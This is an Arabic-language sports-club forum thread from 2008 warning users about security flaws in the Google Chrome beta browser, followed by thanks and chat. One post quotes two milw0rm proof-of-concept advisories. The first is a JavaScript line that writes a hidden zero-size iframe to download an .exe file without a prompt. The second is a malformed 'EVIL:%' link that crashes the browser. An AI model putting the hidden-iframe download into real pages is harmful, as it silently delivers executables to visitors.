نادي الهلال السعودي - شبكة الزعيم - الموقع الرسمي

نادي الهلال السعودي - شبكة الزعيم - الموقع الرسمي (http://vb.alhilal.com/)
-   منتدى الكمبيوتر والإنترنت (http://vb.alhilal.com/f50/)
-   -   متصفح قوقل كروم وثغراته .. (http://vb.alhilal.com/t633127.html)

مجد البطولات 06/09/2008 03:07 AM
متصفح قوقل كروم وثغراته ..
 
من يومين تقريبا تم الافساح عن العملاق الجديد قوقل كروم
و الذي شد انظار العالم لما قدمته قوقل من برمجية قوية في مجال المتصفحات
لكن خاب ظنه و ذلك باكتشاف موقع ميلوورم عن ثغرة بالمتصفح
و الثغرة من نوع تطبيق كود جافا سكربت لفتح تطبيقات ذات امتدادات .exe
رابط الموضوع بالموقع :
http://www.milw0rm.com/exploits/6355
مكتشف الثغرة : nerex
لذلك اخواني نرجوا الاستغناء عنه الى حين صدور النسخ الكاملة و الكمال لله وحده
لأن النسخة هذي عي بيتا و عن قريب سيتم تحديثها و ان شاء الله حلها

من الايميل

هيلانينيو 10 06/09/2008 03:14 AM
يعطيك الف عافيه ع التنبيه ..

تحياتي لك

nsm.99 06/09/2008 03:19 AM
صدقت ياخوي .. فيه مشكلة أنه مافيه المفضلة تسمى بإسم ثاني

مجد البطولات 06/09/2008 06:24 AM
كود الـ PHP:
 *************************************************************************** 
 Authornerex 
 E-mailnerex[at]live[dot]com 

 Google's new Web browser (Chrome) allows files (e.g., executables) to be automatically 
 downloaded to the user's computer without any user prompt

 This proof-of-concept was created for educational purposes only
 Use the code it at your own risk
 The author will not be responsible for any damages

 Tested on Windows Vista SP1 and Windows XP SP3 with Google Chrome (BETA
************************************************************************** 
********** 
********.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">'); 

http://www.milw0rm.com/exploits/6353

الثغرة الثانية

كود الـ PHP:
--------------------------------------------------- 
Software
Google Chrome Browser 0.2.149.27 

Tested
Windows XP Professional SP3 

Result
Google Chrome Crashes with All Tabs 

Problem
An issue exists in how chrome behaves with undefined-handlers in chrome.dll version  
0.2.149.27A crash can result without user interactionWhen a user is made to visit  
a malicious linkwhich has an undefined handler followed by a 'special' character,  
the chrome crashes with a Google Chrome message window "Whoa! Google Chrome has crashed.  
Restart now?"It lies in dealing with the POP EBP instruction when pointed out by the  
EIP register at 0x01002FF4

Proof of Concept
http://evilfingers.com/advisory/google_chrome_poc.php 

Credit
Rishi Narang (psy.echo) 
www.greyhat.in 
www.evilfingers.com 
--------------------------------------------------- 

PoC Working/Exploit
Click for a demo &lt;a href="EVIL:%"&gt;HERE&lt;/a&gt

# milw0rm.com [2008-09-03] 

هلالي اصيل1 07/09/2008 06:09 AM
اشوا الي علمتني مسحته على طول

جزاك الله خير

SweeT Devil 07/09/2008 07:08 AM
لاآ هنتوآ ع آلتوضيح يـ آلغآلين ورده ,, ]

//

ع ـوـوآفـي

مجد البطولات 08/09/2008 08:41 AM
العفو الله يحفظكم يازعماء ...

blue sky 10/09/2008 03:52 AM
ايه والله هالبرنآمج ما استرحت لهـ ..!!

وصرآحه قريت قبل صدورهـ ان فيه عيوب ..!!

والحمدلله ان الكلآم طلع صح , وان فيه اكثر من 5 ثغرات ..!!

مجد البطولات 10/09/2008 08:53 PM
المشكلة المتصفح تجريبي يعني اكيد راح يكون فيه ثغرات

وعيوب ومع ذلك العالم تستخدمه وتجيك ايميلي انسرق

موقعى اخترق :)


الوقت المعتمد في المنتدى بتوقيت جرينتش +3.
الوقت الان » 05:32 AM.

Powered by: vBulletin Version 3.8.7
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd